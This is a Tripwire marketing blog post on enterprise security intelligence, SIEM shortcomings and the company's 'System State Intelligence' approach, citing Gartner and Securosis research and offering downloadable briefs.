Supercharging Incident Detection
In recent conversations I’ve had with Chief Information Security Officers and Heads of Information Security, I’ve noticed that they possess a shared goal of aligning their information security efforts with the needs of the organization. The desire to deliver specific business contextual information that allows for more intelligent analysis and better decision making is palpable.
In my search for frameworks or methods that could be utilized to integrate disjointed sources of data, I came across a Gartner research note, titled Prepare for the Emergence of Enterprise Security Intelligence, by Joseph Feiman, VP and Gartner Fellow. Enterprise Security Intelligence (ESI) is defined as an emerging concept that is a comprehensive and holistic alternative to traditional disjointed security approaches that will enable stronger enterprise-wide security, optimal decision making and better business results.
So wait a minute — what about SIEM?
Don’t we already have something called Security Information and Event Management (SIEM) that is aimed to address (at least partially) this need? Gartner has a research note SIEM Enables Enterprise Security Intelligence, by Joseph Feiman and Mark Nicolett that covers this in more detail.
In addition, the analyst firm Securosis produced a report titled Security Management 2.0: Time to Replace Your SIEM?, in which analysts Adrian Lane and Mike Rothman write: “Of the customers we talk with, there is general dissatisfaction with SIEM implementations – which in many cases have not delivered the expected value. The issues typically result from failure to scale, poor ease of use, challenges using the collected data in actionable timeframes, excessive effort for care & feeding and maintenance, or just customer execution.”
At Tripwire we also believe that SIEM alone is not enough. We believe that being aware of the full state of your systems — how they’re configured and whether they’re configured according to your policy — lets you anchor your systems to a baseline of “known and trusted state.” As important as this first element, is the need to continuously monitor your system for changes and deviations and detect suspicious events to enable security context and prioritization. Here at Tripwire we call this System State Intelligence (SSI).
The Benefits of Enterprise Security Intelligence
According to Gartner, ESI holds the potential to offer higher accuracy of security vulnerability detection, remediation, and protection based on technology interaction and correlation. ESI also holds the potential to transform what the enterprise understands about its own security efforts, enabling correlation and impact analysis across all sources of security information and contextual information, detailed understanding of enterprise security, and improved decision making. In this, ESI aims to deliver both improved security and advanced business value.
How does System State Intelligence fits into ESI?
We consider SSI as a key feed into Enterprise Security Intelligence model. To understand how this works, we’ve published a brief that provides you with:
- Your complimentary copy of Prepare for the Emergence of Enterprise Security Intelligence research note
- Q&A with Dwayne Melancon, CTO of Tripwire, to explore how System State Intelligence feeds into ESI
- Solutions Brief: System State Intelligence Puts Security in Your Control
- Archived Webcast: “Supercharging SIEM with Change & Configuration Data”
These and other resources are consolidated in this overview for your download and enjoyment.
Businessman streaming data image courtesy of Shutterstock.